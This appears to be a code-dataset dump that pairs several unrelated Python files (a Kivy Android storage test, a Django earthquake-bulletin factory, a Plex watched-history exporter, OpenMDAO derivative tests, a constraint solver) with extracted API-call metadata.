(18197, 18281), False, 'from s3 import S3DateFilter, S3LocationFilter, S3OptionsFilter, S3TextFilter\n'), ((18542, 18627), 's3.S3OptionsFilter', 'S3OptionsFilter', (['"""tag_post.tag_id"""'], {'label': '""""""', 'noneSelectedText': '"""Tag"""', 'no_opts': '""""""'}), "('tag_post.tag_id', label='', noneSelectedText='Tag', no_opts=''\n )\n", (18557, 18627), False, 'from s3 import S3DateFilter, S3LocationFilter, S3OptionsFilter, S3TextFilter\n'), ((26777, 26872), 's3.IS_ONE_OF', 'IS_ONE_OF', (['set', '"""event_incident.id"""', 'f.represent'], {'orderby': '"""event_incident.name"""', 'sort': '(True)'}), "(set, 'event_incident.id', f.represent, orderby=\n 'event_incident.name', sort=True)\n", (26786, 26872), False, 'from s3 import IS_ONE_OF, S3SQLCustomForm, S3SQLInlineComponent\n'), ((19152, 19252), 's3.S3OptionsFilter', 'S3OptionsFilter', (['"""incident_post.incident_id"""'], {'label': '""""""', 'noneSelectedText': '"""Incident"""', 'no_opts': '""""""'}), "('incident_post.incident_id', label='', noneSelectedText=\n 'Incident', no_opts='')\n", (19167, 19252), False, 'from s3 import S3DateFilter, S3LocationFilter, S3OptionsFilter, S3TextFilter\n'), ((16060, 16065), 's3.FS', 'FS', (['k'], {}), '(k)\n', (16062, 16065), False, 'from s3 import FS\n'), ((35935, 35962), 's3.S3SQLCustomForm', 'S3SQLCustomForm', (['"""event_id"""'], {}), "('event_id')\n", (35950, 35962), False, 'from s3 import S3SQLCustomForm\n')] |
import kivy
from kivy.app import App
from kivy.uix.button import Button
import android
import os
import time
from android.permissions import Permission, request_permission, check_permission
from kivy.clock import Clock
class MyApp(App):
def second_thread(self, data):
print("starting second thread")
permission_status = check_permission(Permission.WRITE_EXTERNAL_STORAGE)
print(permission_status)
if permission_status is not None and permission_status:
print("got permission")
path = os.environ["SECONDARY_STORAGE"]
test_path = os.path.join(path, "test_yay")
os.makedirs(test_path)
else:
Clock.schedule_once(self.second_thread, 1)
def callback(self, data):
print("Pushed button, running")
print("request permission")
print(request_permission(Permission.WRITE_EXTERNAL_STORAGE))
Clock.schedule_once(self.second_thread, 5)
def build(self):
return Button(text='Touch to test writing to ' + os.environ["SECONDARY_STORAGE"], on_press=self.callback)
if __name__ == '__main__':
MyApp().run()
| [
"kivy.uix.button.Button",
"os.makedirs",
"os.path.join",
"kivy.clock.Clock.schedule_once",
"android.permissions.request_permission",
"android.permissions.check_permission"
] | [((344, 395), 'android.permissions.check_permission', 'check_permission', (['Permission.WRITE_EXTERNAL_STORAGE'], {}), '(Permission.WRITE_EXTERNAL_STORAGE)\n', (360, 395), False, 'from android.permissions import Permission, request_permission, check_permission\n'), ((956, 998), 'kivy.clock.Clock.schedule_once', 'Clock.schedule_once', (['self.second_thread', '(5)'], {}), '(self.second_thread, 5)\n', (975, 998), False, 'from kivy.clock import Clock\n'), ((1039, 1141), 'kivy.uix.button.Button', 'Button', ([], {'text': "('Touch to test writing to ' + os.environ['SECONDARY_STORAGE'])", 'on_press': 'self.callback'}), "(text='Touch to test writing to ' + os.environ['SECONDARY_STORAGE'],\n on_press=self.callback)\n", (1045, 1141), False, 'from kivy.uix.button import Button\n'), ((613, 643), 'os.path.join', 'os.path.join', (['path', '"""test_yay"""'], {}), "(path, 'test_yay')\n", (625, 643), False, 'import os\n'), ((656, 678), 'os.makedirs', 'os.makedirs', (['test_path'], {}), '(test_path)\n', (667, 678), False, 'import os\n'), ((705, 747), 'kivy.clock.Clock.schedule_once', 'Clock.schedule_once', (['self.second_thread', '(1)'], {}), '(self.second_thread, 1)\n', (724, 747), False, 'from kivy.clock import Clock\n'), ((893, 946), 'android.permissions.request_permission', 'request_permission', (['Permission.WRITE_EXTERNAL_STORAGE'], {}), '(Permission.WRITE_EXTERNAL_STORAGE)\n', (911, 946), False, 'from android.permissions import Permission, request_permission, check_permission\n')] |
from datetime import timedelta
import random
from django.utils import timezone
import factory
class BulletinFactory(factory.DjangoModelFactory):
class Meta:
model = 'bulletin.Bulletin'
url = factory.Sequence(lambda n: f'https://www.sitepage.com/{n}')
latitude = factory.Faker(
'pydecimal',
right_digits=2,
min_value=-90,
max_value=90
)
longitude = factory.Faker(
'pydecimal',
right_digits=2,
min_value=-180,
max_value=180
)
depth = factory.Faker(
'pydecimal',
right_digits=1,
min_value=0,
max_value=500
)
magnitude = factory.Faker(
'pydecimal',
right_digits=1,
min_value=1,
max_value=10
)
location = factory.Faker('address')
@factory.sequence
def time_of_quake(n):
"""Creates sequence of datetime obj 30 minutes apart."""
td = timedelta(minutes=30)
return timezone.now() - (n * td)
| [
"django.utils.timezone.now",
"factory.Faker",
"datetime.timedelta",
"factory.Sequence"
] | [((224, 283), 'factory.Sequence', 'factory.Sequence', (["(lambda n: f'https://www.sitepage.com/{n}')"], {}), "(lambda n: f'https://www.sitepage.com/{n}')\n", (240, 283), False, 'import factory\n'), ((300, 371), 'factory.Faker', 'factory.Faker', (['"""pydecimal"""'], {'right_digits': '(2)', 'min_value': '(-90)', 'max_value': '(90)'}), "('pydecimal', right_digits=2, min_value=-90, max_value=90)\n", (313, 371), False, 'import factory\n'), ((432, 505), 'factory.Faker', 'factory.Faker', (['"""pydecimal"""'], {'right_digits': '(2)', 'min_value': '(-180)', 'max_value': '(180)'}), "('pydecimal', right_digits=2, min_value=-180, max_value=180)\n", (445, 505), False, 'import factory\n'), ((562, 632), 'factory.Faker', 'factory.Faker', (['"""pydecimal"""'], {'right_digits': '(1)', 'min_value': '(0)', 'max_value': '(500)'}), "('pydecimal', right_digits=1, min_value=0, max_value=500)\n", (575, 632), False, 'import factory\n'), ((693, 762), 'factory.Faker', 'factory.Faker', (['"""pydecimal"""'], {'right_digits': '(1)', 'min_value': '(1)', 'max_value': '(10)'}), "('pydecimal', right_digits=1, min_value=1, max_value=10)\n", (706, 762), False, 'import factory\n'), ((822, 846), 'factory.Faker', 'factory.Faker', (['"""address"""'], {}), "('address')\n", (835, 846), False, 'import factory\n'), ((979, 1000), 'datetime.timedelta', 'timedelta', ([], {'minutes': '(30)'}), '(minutes=30)\n', (988, 1000), False, 'from datetime import timedelta\n'), ((1017, 1031), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1029, 1031), False, 'from django.utils import timezone\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# python3 -m pip install --force -U --user PlexAPI
"""
Metadata to be handled:
* Audiobooks
* Playlists -- https://github.com/pkkid/python-plexapi/issues/551
"""
import copy
import json
import time
import logging
import collections
from urllib.parse import urlparse
import plexapi
import plexapi.video
import plexapi.myplex
import plexapi.server
import plexapi.library
import plexapi.exceptions
PLEX_URL = ""
PLEX_TOKEN = ""
WATCHED_HISTORY = ""
LOG_FILE = ""
BATCH_SIZE = 10000
PLEX_REQUESTS_SLEEP = 0
CHECK_USERS = [
]
LOG_FORMAT = \
"[%(name)s][%(process)05d][%(asctime)s][%(levelname)-8s][%(funcName)-15s]" \
" %(message)s"
LOG_DATE_FORMAT = "%Y-%m-%dT%H:%M:%SZ"
LOG_LEVEL = logging.INFO
plexapi.server.TIMEOUT = 3600
plexapi.server.X_PLEX_CONTAINER_SIZE = 2500
_SHOW_RATING_KEY_GUID_MAPPING = {}
_MOVIE_RATING_KEY_GUID_MAPPING = {}
_EPISODE_RATING_KEY_GUID_MAPPING = {}
logger = logging.getLogger("PlexWatchedHistoryExporter")
SHOW_HISTORY = {
'guid': "",
'title': "",
'watched': False,
'userRating': "",
'episodes': collections.defaultdict(lambda: copy.deepcopy(EPISODE_HISTORY))
}
MOVIE_HISTORY = {
'guid': "",
'title': "",
'watched': False,
'viewCount': 0,
'viewOffset': 0,
'userRating': ""
}
EPISODE_HISTORY = {
'guid': "",
'title': "",
'watched': False,
'viewCount': 0,
'viewOffset': 0,
'userRating': ""
}
def _get_config_str(key):
return plexapi.CONFIG.get(key, default="", cast=str).strip("'").strip('"').strip()
def _load_config():
global PLEX_URL, PLEX_TOKEN, WATCHED_HISTORY, CHECK_USERS, LOG_FILE, LOG_LEVEL
if PLEX_URL == "":
PLEX_URL = _get_config_str("sync.src_url")
if PLEX_TOKEN == "":
PLEX_TOKEN = _get_config_str("sync.src_token")
if WATCHED_HISTORY == "":
WATCHED_HISTORY = _get_config_str("sync.watched_history")
if len(CHECK_USERS) == 0:
config_check_users = _get_config_str("sync.check_users").split(",")
CHECK_USERS = [user.strip() for user in config_check_users if user]
if LOG_FILE == "":
LOG_FILE = _get_config_str("sync.export_log_file")
debug = plexapi.utils.cast(bool, _get_config_str("sync.debug").lower())
if debug:
LOG_LEVEL = logging.DEBUG
def _setup_logger():
logging.Formatter.converter = time.gmtime
logging.raiseExceptions = False
logger.setLevel(logging.DEBUG)
logger.handlers = []
logger.propagate = False
detailed_formatter = logging.Formatter(fmt=LOG_FORMAT,
datefmt=LOG_DATE_FORMAT)
file_handler = logging.FileHandler(filename=LOG_FILE, mode="a+")
file_handler.setFormatter(detailed_formatter)
file_handler.setLevel(LOG_LEVEL)
logger.addHandler(file_handler)
def _cast(func, value):
if value is None:
return func()
if func == str:
return str(value)
if not isinstance(value, func):
raise ValueError(value)
return value
def _get_guid(rating_key_guid_mapping, item):
if item.ratingKey in rating_key_guid_mapping:
item_guid = rating_key_guid_mapping[item.ratingKey]
else:
item_guid = item.guid
rating_key_guid_mapping[item.ratingKey] = item_guid
return item_guid
def _tv_item_iterator(plex_section, start, batch_size):
libtype = "show"
# Get shows that have been fully watched
watched_kwargs = {'show.unwatchedLeaves': False}
items = plex_section.search(
libtype=libtype,
container_start=start,
maxresults=batch_size,
**watched_kwargs
)
for item in items:
logger.debug(f"Fully Watched Show: {item.title}")
yield item
# Get shows have have not been fully watched but have episodes have been fully watched
# Searching by episode.viewCount instead of show.viewCount to handle shows with
# episodes that were watched and then unwatched
partially_watched_kwargs = {'show.unwatchedLeaves': True, 'episode.viewCount!=': 0}
items = plex_section.search(
libtype=libtype,
container_start=start,
maxresults=batch_size,
**partially_watched_kwargs
)
for item in items:
logger.debug(f"Partially Watched Show with Fully Watched Episodes: {item.title}")
yield item
# Get shows have have not been fully watched and have no episodes that have been fully
# watched but have episodes that are in-progress
partially_watched_kwargs = {'show.unwatchedLeaves': True, 'show.viewCount=': 0,
'episode.inProgress': True}
items = plex_section.search(
libtype=libtype,
container_start=start,
maxresults=batch_size,
**partially_watched_kwargs
)
for item in items:
logger.debug(f"Partially Watched Show with Partially Watched Episodes: {item.title}")
yield item
def _movie_item_iterator(plex_section, start, batch_size):
libtype = "movie"
watched_kwargs = {'movie.viewCount!=': 0}
partially_watched_kwargs = {'movie.viewCount=': 0, 'movie.inProgress': True}
items = plex_section.search(
libtype=libtype,
container_start=start,
maxresults=batch_size,
**watched_kwargs
)
for item in items:
yield item
items = plex_section.search(
libtype=libtype,
container_start=start,
maxresults=batch_size,
**partially_watched_kwargs
)
for item in items:
yield item
def _batch_get(plex_section, batch_size):
start = 0
while True:
if start >= plex_section.totalSize:
break
if isinstance(plex_section, plexapi.library.ShowSection):
yield from _tv_item_iterator(plex_section, start, batch_size)
elif isinstance(plex_section, plexapi.library.MovieSection):
yield from _movie_item_iterator(plex_section, start, batch_size)
else:
logger.warning(f"Skipping Un-processable Section: {plex_section.title} [{plex_section.type}]")
return
start = start + 1 + batch_size
def _get_movie_section_watched_history(section, movie_history):
movies_watched_history = _batch_get(section, BATCH_SIZE)
for movie in movies_watched_history:
movie_guid = _get_guid(_MOVIE_RATING_KEY_GUID_MAPPING, movie)
# TODO: Check if reload is necessary
# movie.reload(checkFiles=False)
if urlparse(movie_guid).scheme != 'plex':
continue
if movie.isWatched:
logger.debug(f"Fully Watched Movie: {movie.title} [{movie_guid}]")
movie_history[movie_guid].update({
'guid': _cast(str, movie_guid),
'title': _cast(str, movie.title),
'watched': _cast(bool, movie.isWatched),
'viewCount': _cast(int, movie.viewCount),
'viewOffset': _cast(int, movie.viewOffset),
'userRating': _cast(str, movie.userRating)
})
else:
logger.debug(f"Partially Watched Movie: {movie.title} [{movie_guid}]")
existing_watched = movie_history[movie_guid]['watched']
# Prefer fully watched over partially watched entries
# TODO: Check for userRating & viewOffset too, however this shouldn't ever be
# different since Plex tracks the item via the GUID across libraries/sections
if existing_watched:
continue
movie_history[movie_guid].update({
'guid': _cast(str, movie_guid),
'title': _cast(str, movie.title),
'watched': _cast(bool, movie.isWatched),
'viewCount': _cast(int, movie.viewCount),
'viewOffset': _cast(int, movie.viewOffset),
'userRating': _cast(str, movie.userRating)
})
def _get_show_section_watched_history(section, show_history):
shows_watched_history = _batch_get(section, BATCH_SIZE)
for show in shows_watched_history:
show_guid = _get_guid(_SHOW_RATING_KEY_GUID_MAPPING, show)
# TODO: Check if reload is necessary
# show.reload(checkFiles=False)
if urlparse(show_guid).scheme != 'plex':
continue
show_item_history = show_history[show_guid]
if show.isWatched:
logger.debug(f"Fully Watched Show: {show.title} [{show_guid}]")
show_item_history.update({
'guid': _cast(str, show_guid),
'title': _cast(str, show.title),
'watched': _cast(bool, show.isWatched),
'userRating': _cast(str, show.userRating),
})
for episode in show.episodes(viewCount__gt=0):
episode_guid = _get_guid(_EPISODE_RATING_KEY_GUID_MAPPING, episode)
logger.debug(f"Fully Watched Episode: {episode.title} [{episode_guid}]")
show_item_history['episodes'][episode_guid].update({
'guid': _cast(str, episode_guid),
'title': _cast(str, episode.title),
'watched': _cast(bool, episode.isWatched),
'viewCount': _cast(int, episode.viewCount),
'viewOffset': _cast(int, episode.viewOffset),
'userRating': _cast(str, episode.userRating),
})
else:
logger.debug(f"Partially Watched Show: {show.title} [{show_guid}]")
# Prefer fully watched over partially watched entries
# TODO: Check for userRating & viewOffset too, however this shouldn't ever be
# different since Plex tracks the item via the GUID across libraries/sections
existing_watched = show_item_history['watched']
if existing_watched:
continue
show_item_history.update({
'guid': _cast(str, show_guid),
'title': _cast(str, show.title),
'watched': _cast(bool, show.isWatched),
'userRating': _cast(str, show.userRating),
})
for episode in show.episodes(viewCount__gt=0):
episode_guid = _get_guid(_EPISODE_RATING_KEY_GUID_MAPPING, episode)
logger.debug(f"Fully Watched Episode: {episode.title} [{episode_guid}]")
show_item_history['episodes'][episode_guid].update({
'guid': _cast(str, episode_guid),
'title': _cast(str, episode.title),
'watched': _cast(bool, episode.isWatched),
'viewCount': _cast(int, episode.viewCount),
'viewOffset': _cast(int, episode.viewOffset),
'userRating': _cast(str, episode.userRating),
})
for episode in show.episodes(viewOffset__gt=0):
episode_guid = _get_guid(_EPISODE_RATING_KEY_GUID_MAPPING, episode)
logger.debug(f"Partially Watched Episode: {episode.title} [{episode_guid}]")
show_item_history['episodes'][episode_guid].update({
'guid': _cast(str, episode_guid),
'title': _cast(str, episode.title),
'watched': _cast(bool, episode.isWatched),
'viewCount': _cast(int, episode.viewCount),
'viewOffset': _cast(int, episode.viewOffset),
'userRating': _cast(str, episode.userRating),
})
show_history[show_guid] = show_item_history
def _get_user_server_watched_history(server):
show_history = collections.defaultdict(lambda: copy.deepcopy(SHOW_HISTORY))
movie_history = collections.defaultdict(lambda: copy.deepcopy(MOVIE_HISTORY))
music_history = {}
for section in server.library.sections():
if section.type == "movie":
_get_movie_section_watched_history(section, movie_history)
elif section.type == "show":
_get_show_section_watched_history(section, show_history)
else:
logger.warning(f"Skipping Un-processable Section: {section.title} [{section.type}]")
user_history = {
'show': show_history,
'movie': movie_history,
'music': music_history,
}
return user_history
def main():
_load_config()
_setup_logger()
plex_server = plexapi.server.PlexServer(PLEX_URL, PLEX_TOKEN, timeout=300)
plex_account = plex_server.myPlexAccount()
watched_history = {}
logger.info(f"Starting Export")
plex_users = plex_account.users()
# Owner will be processed separately
logger.info(f"Total Users: {len(plex_users) + 1}")
if not (len(CHECK_USERS) > 0 and plex_account.username not in CHECK_USERS and
plex_account.email not in CHECK_USERS):
logger.info(f"Processing Owner: {plex_account.username}")
user_history = _get_user_server_watched_history(plex_server)
user_history['username'] = plex_account.username
watched_history[plex_account.username] = user_history
for user_index, user in enumerate(plex_users):
if (len(CHECK_USERS) > 0 and user.username not in CHECK_USERS and
user.email not in CHECK_USERS):
continue
logger.info(f"Processing User: {user.username}")
user_server_token = user.get_token(plex_server.machineIdentifier)
try:
user_server = plexapi.server.PlexServer(PLEX_URL, user_server_token, timeout=300)
except plexapi.exceptions.Unauthorized:
# This should only happen when no libraries are shared
logger.warning(f"Skipped User with No Libraries Shared: {user.username}")
continue
user_history = _get_user_server_watched_history(user_server)
user_history['username'] = user.username
watched_history[user.username] = user_history
with open(WATCHED_HISTORY, "w") as watched_history_file:
json.dump(watched_history, watched_history_file, sort_keys=True, indent=4)
logger.info(f"Completed Export")
if __name__ == "__main__":
main()
| [
"logging.getLogger",
"plexapi.server.PlexServer",
"urllib.parse.urlparse",
"logging.Formatter",
"plexapi.CONFIG.get",
"logging.FileHandler",
"copy.deepcopy",
"json.dump"
] | [((958, 1005), 'logging.getLogger', 'logging.getLogger', (['"""PlexWatchedHistoryExporter"""'], {}), "('PlexWatchedHistoryExporter')\n", (975, 1005), False, 'import logging\n'), ((2539, 2597), 'logging.Formatter', 'logging.Formatter', ([], {'fmt': 'LOG_FORMAT', 'datefmt': 'LOG_DATE_FORMAT'}), '(fmt=LOG_FORMAT, datefmt=LOG_DATE_FORMAT)\n', (2556, 2597), False, 'import logging\n'), ((2660, 2709), 'logging.FileHandler', 'logging.FileHandler', ([], {'filename': 'LOG_FILE', 'mode': '"""a+"""'}), "(filename=LOG_FILE, mode='a+')\n", (2679, 2709), False, 'import logging\n'), ((12400, 12460), 'plexapi.server.PlexServer', 'plexapi.server.PlexServer', (['PLEX_URL', 'PLEX_TOKEN'], {'timeout': '(300)'}), '(PLEX_URL, PLEX_TOKEN, timeout=300)\n', (12425, 12460), False, 'import plexapi\n'), ((14000, 14074), 'json.dump', 'json.dump', (['watched_history', 'watched_history_file'], {'sort_keys': '(True)', 'indent': '(4)'}), '(watched_history, watched_history_file, sort_keys=True, indent=4)\n', (14009, 14074), False, 'import json\n'), ((1150, 1180), 'copy.deepcopy', 'copy.deepcopy', (['EPISODE_HISTORY'], {}), '(EPISODE_HISTORY)\n', (1163, 1180), False, 'import copy\n'), ((11676, 11703), 'copy.deepcopy', 'copy.deepcopy', (['SHOW_HISTORY'], {}), '(SHOW_HISTORY)\n', (11689, 11703), False, 'import copy\n'), ((11757, 11785), 'copy.deepcopy', 'copy.deepcopy', (['MOVIE_HISTORY'], {}), '(MOVIE_HISTORY)\n', (11770, 11785), False, 'import copy\n'), ((13466, 13533), 'plexapi.server.PlexServer', 'plexapi.server.PlexServer', (['PLEX_URL', 'user_server_token'], {'timeout': '(300)'}), '(PLEX_URL, user_server_token, timeout=300)\n', (13491, 13533), False, 'import plexapi\n'), ((6499, 6519), 'urllib.parse.urlparse', 'urlparse', (['movie_guid'], {}), '(movie_guid)\n', (6507, 6519), False, 'from urllib.parse import urlparse\n'), ((8250, 8269), 'urllib.parse.urlparse', 'urlparse', (['show_guid'], {}), '(show_guid)\n', (8258, 8269), False, 'from urllib.parse import urlparse\n'), ((1499, 1544), 'plexapi.CONFIG.get', 'plexapi.CONFIG.get', (['key'], {'default': '""""""', 'cast': 'str'}), "(key, default='', cast=str)\n", (1517, 1544), False, 'import plexapi\n')] |
from datetime import datetime
from decimal import Decimal
from src.models import db, Required, Optional
class Product(db.Entity):
name = Required(str, unique=True)
price = Required(Decimal)
description = Optional(str)
create_time = Required(datetime, default=datetime.now, precision=6)
update_time = Optional(datetime)
def before_update(self):
self.update_time = datetime.now()
| [
"datetime.datetime.now",
"src.models.Optional",
"src.models.Required"
] | [((144, 170), 'src.models.Required', 'Required', (['str'], {'unique': '(True)'}), '(str, unique=True)\n', (152, 170), False, 'from src.models import db, Required, Optional\n'), ((183, 200), 'src.models.Required', 'Required', (['Decimal'], {}), '(Decimal)\n', (191, 200), False, 'from src.models import db, Required, Optional\n'), ((219, 232), 'src.models.Optional', 'Optional', (['str'], {}), '(str)\n', (227, 232), False, 'from src.models import db, Required, Optional\n'), ((251, 304), 'src.models.Required', 'Required', (['datetime'], {'default': 'datetime.now', 'precision': '(6)'}), '(datetime, default=datetime.now, precision=6)\n', (259, 304), False, 'from src.models import db, Required, Optional\n'), ((323, 341), 'src.models.Optional', 'Optional', (['datetime'], {}), '(datetime)\n', (331, 341), False, 'from src.models import db, Required, Optional\n'), ((399, 413), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (411, 413), False, 'from datetime import datetime\n')] |
""" Testing group-level finite difference. """
import unittest
import numpy as np
from openmdao.components.param_comp import ParamComp
from openmdao.core.component import Component
from openmdao.core.group import Group
from openmdao.core.problem import Problem
from openmdao.test.converge_diverge import ConvergeDivergeGroups
from openmdao.test.simple_comps import SimpleCompDerivMatVec
from openmdao.test.util import assert_rel_error
class TestGroupDerivatves(unittest.TestCase):
def test_simple_matvec(self):
class VerificationComp(SimpleCompDerivMatVec):
def jacobian(self, params, unknowns, resids):
raise RuntimeError("Derivative functions on this comp should not run.")
def apply_linear(self, params, unknowns, dparams, dunknowns,
dresids, mode):
raise RuntimeError("Derivative functions on this comp should not run.")
sub = Group()
sub.add('mycomp', VerificationComp())
prob = Problem()
prob.root = Group()
prob.root.add('sub', sub)
prob.root.add('x_param', ParamComp('x', 1.0))
prob.root.connect('x_param.x', "sub.mycomp.x")
sub.fd_options['force_fd'] = True
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(['x_param.x'], ['sub.mycomp.y'], mode='fwd',
return_format='dict')
assert_rel_error(self, J['sub.mycomp.y']['x_param.x'][0][0], 2.0, 1e-6)
J = prob.calc_gradient(['x_param.x'], ['sub.mycomp.y'], mode='rev',
return_format='dict')
assert_rel_error(self, J['sub.mycomp.y']['x_param.x'][0][0], 2.0, 1e-6)
def test_converge_diverge_groups(self):
prob = Problem()
prob.root = Group()
prob.root.add('sub', ConvergeDivergeGroups())
param_list = ['sub.p.x']
unknown_list = ['sub.comp7.y1']
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(param_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['sub.comp7.y1']['sub.p.x'][0][0], -40.75, 1e-6)
J = prob.calc_gradient(param_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['sub.comp7.y1']['sub.p.x'][0][0], -40.75, 1e-6)
def test_group_fd(self):
class SimpleComp(Component):
""" A simple component that provides derivatives. """
def __init__(self):
super(SimpleComp, self).__init__()
# Params
self.add_param('x', 2.0)
# Unknowns
self.add_output('y', 0.0)
def solve_nonlinear(self, params, unknowns, resids):
""" Doesn't do much. Just multiply by 3"""
unknowns['y'] = 3.0*params['x']
def jacobian(self, params, unknowns, resids):
"""Analytical derivatives."""
J = {}
J[('y', 'x')] = 3.0
return J
class Model(Group):
""" Simple model to experiment with finite difference."""
def __init__(self):
super(Model, self).__init__()
self.add('px', ParamComp('x', 2.0))
self.add('comp1', SimpleComp())
sub = self.add('sub', Group())
sub.add('comp2', SimpleComp())
sub.add('comp3', SimpleComp())
self.add('comp4', SimpleComp())
self.connect('px.x', 'comp1.x')
self.connect('comp1.y', 'sub.comp2.x')
self.connect('sub.comp2.y', 'sub.comp3.x')
self.connect('sub.comp3.y', 'comp4.x')
self.sub.fd_options['force_fd'] = True
prob = Problem()
prob.root = Model()
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(['px.x'], ['comp4.y'])
assert_rel_error(self, J[0][0], 81.0, 1e-6)
if __name__ == "__main__":
unittest.main()
| [
"openmdao.components.param_comp.ParamComp",
"openmdao.core.problem.Problem",
"openmdao.test.converge_diverge.ConvergeDivergeGroups",
"openmdao.core.group.Group",
"openmdao.test.util.assert_rel_error",
"unittest.main"
] | [((4041, 4056), 'unittest.main', 'unittest.main', ([], {}), '()\n', (4054, 4056), False, 'import unittest\n'), ((945, 952), 'openmdao.core.group.Group', 'Group', ([], {}), '()\n', (950, 952), False, 'from openmdao.core.group import Group\n'), ((1015, 1024), 'openmdao.core.problem.Problem', 'Problem', ([], {}), '()\n', (1022, 1024), False, 'from openmdao.core.problem import Problem\n'), ((1045, 1052), 'openmdao.core.group.Group', 'Group', ([], {}), '()\n', (1050, 1052), False, 'from openmdao.core.group import Group\n'), ((1427, 1499), 'openmdao.test.util.assert_rel_error', 'assert_rel_error', (['self', "J['sub.mycomp.y']['x_param.x'][0][0]", '(2.0)', '(1e-06)'], {}), "(self, J['sub.mycomp.y']['x_param.x'][0][0], 2.0, 1e-06)\n", (1443, 1499), False, 'from openmdao.test.util import assert_rel_error\n'), ((1636, 1708), 'openmdao.test.util.assert_rel_error', 'assert_rel_error', (['self', "J['sub.mycomp.y']['x_param.x'][0][0]", '(2.0)', '(1e-06)'], {}), "(self, J['sub.mycomp.y']['x_param.x'][0][0], 2.0, 1e-06)\n", (1652, 1708), False, 'from openmdao.test.util import assert_rel_error\n'), ((1769, 1778), 'openmdao.core.problem.Problem', 'Problem', ([], {}), '()\n', (1776, 1778), False, 'from openmdao.core.problem import Problem\n'), ((1799, 1806), 'openmdao.core.group.Group', 'Group', ([], {}), '()\n', (1804, 1806), False, 'from openmdao.core.group import Group\n'), ((2087, 2160), 'openmdao.test.util.assert_rel_error', 'assert_rel_error', (['self', "J['sub.comp7.y1']['sub.p.x'][0][0]", '(-40.75)', '(1e-06)'], {}), "(self, J['sub.comp7.y1']['sub.p.x'][0][0], -40.75, 1e-06)\n", (2103, 2160), False, 'from openmdao.test.util import assert_rel_error\n'), ((2260, 2333), 'openmdao.test.util.assert_rel_error', 'assert_rel_error', (['self', "J['sub.comp7.y1']['sub.p.x'][0][0]", '(-40.75)', '(1e-06)'], {}), "(self, J['sub.comp7.y1']['sub.p.x'][0][0], -40.75, 1e-06)\n", (2276, 2333), False, 'from openmdao.test.util import assert_rel_error\n'), ((3811, 3820), 'openmdao.core.problem.Problem', 'Problem', ([], {}), '()\n', (3818, 3820), False, 'from openmdao.core.problem import Problem\n'), ((3964, 4008), 'openmdao.test.util.assert_rel_error', 'assert_rel_error', (['self', 'J[0][0]', '(81.0)', '(1e-06)'], {}), '(self, J[0][0], 81.0, 1e-06)\n', (3980, 4008), False, 'from openmdao.test.util import assert_rel_error\n'), ((1120, 1139), 'openmdao.components.param_comp.ParamComp', 'ParamComp', (['"""x"""', '(1.0)'], {}), "('x', 1.0)\n", (1129, 1139), False, 'from openmdao.components.param_comp import ParamComp\n'), ((1836, 1859), 'openmdao.test.converge_diverge.ConvergeDivergeGroups', 'ConvergeDivergeGroups', ([], {}), '()\n', (1857, 1859), False, 'from openmdao.test.converge_diverge import ConvergeDivergeGroups\n'), ((3262, 3281), 'openmdao.components.param_comp.ParamComp', 'ParamComp', (['"""x"""', '(2.0)'], {}), "('x', 2.0)\n", (3271, 3281), False, 'from openmdao.components.param_comp import ParamComp\n'), ((3370, 3377), 'openmdao.core.group.Group', 'Group', ([], {}), '()\n', (3375, 3377), False, 'from openmdao.core.group import Group\n')] |
from __future__ import absolute_import
import ujson
from rsbroker.core.upstream import RTCWebSocketClient
class BaseUserManager(object):
room_to_uid = {}
uid_to_handler = {}
def register(self, obj):
"""
Dispatch all resource which user need!
:param obj:
:return:
"""
raise NotImplementedError
def unregister(self, obj):
"""
Release all resource if user out!
:param obj:
:return:
"""
raise NotImplementedError
def send(self, request):
"""
Send news to room-server by web socket!
:param request: a dict type
Example:
{
'method': 'check_in',
'uid': uid
}
:return: a dict type
Example:
{
'status': '100',
'mid': '1001',
'body': {'info':'check in failure'}
}
"""
raise NotImplementedError
class UserManager(BaseUserManager):
"""
Implementation all declare method from parent class!
"""
def register(self, obj):
room = obj.room
uid = obj.uid
request = {'method': 'check_in', 'uid': uid}
response = self.send(request)
data = ujson.loads(response)
mid = data.get("mid")
if mid == "1001":
# check in failure
raise ValueError("Check in failure, no source for uid [%s]" % uid)
else:
if room in self.room_to_uid:
self.room_to_uid[room].add(uid)
else:
self.room_to_uid[obj.room] = set()
self.uid_to_handler[uid] = obj
def unregister(self, obj):
room = obj.room
uid = obj.uid
request = {'method': 'check_in', 'uid': uid}
response = self.send(request)
data = ujson.loads(response)
mid = data.get("mid")
if mid == '1003':
raise ValueError("Check out failure, the user may already check out!")
else:
if room in self.room_to_uid:
self.room_to_uid[room].remove(uid)
if uid in self.uid_to_handler:
del self.uid_to_handle[uid]
| [
"ujson.loads"
] | [((1291, 1312), 'ujson.loads', 'ujson.loads', (['response'], {}), '(response)\n', (1302, 1312), False, 'import ujson\n'), ((1880, 1901), 'ujson.loads', 'ujson.loads', (['response'], {}), '(response)\n', (1891, 1901), False, 'import ujson\n')] |
from pgm.pgmplayer import PGMPlayer
import cps_constraints as con
from operator import itemgetter
import uuid
import os
class ConstraintSolver:
def __init__(self, my_con_collector, my_con_scoper, SHOULD_USE_CONSTRAINT_SCOPING=False):
self.con_collector = my_con_collector
self.con_scoper = my_con_scoper
self.SHOULD_PRINT_VARIABLE_TYPES = False
self.SHOULD_USE_CONSTRAINT_SCOPING = SHOULD_USE_CONSTRAINT_SCOPING
self.ENABLE_SCOPER = False
self.pred2pgmvar = {}
self.pgmvar2pred = {}
self.uuid = str(uuid.uuid4())
def solve(self):
#print con.units
#print con.non_unit_variables
#print "Dimensionless:"
#print con.dimensionless_variables
self.pred2pgmvar = {}
self.pgmvar2pred = {}
var2unitproba = {}
for unit in con.units:
fg_filename = "pgm/predict_" + str(unit).replace(" ", "") + self.uuid + ".fg"
player = self.prepare(fg_filename, unit)
pgmvar2proba = player.compute_marginals()
#print {v.name: '%.4f' % (1.0 - p) for v, p in pgmvar2proba.items()}
os.remove(fg_filename)
for pred, pgmvar in self.pred2pgmvar.items():
self.pgmvar2pred[pgmvar] = pred
#print '---------------------'
#print 'Probabilistic Units:'
#print '---------------------'
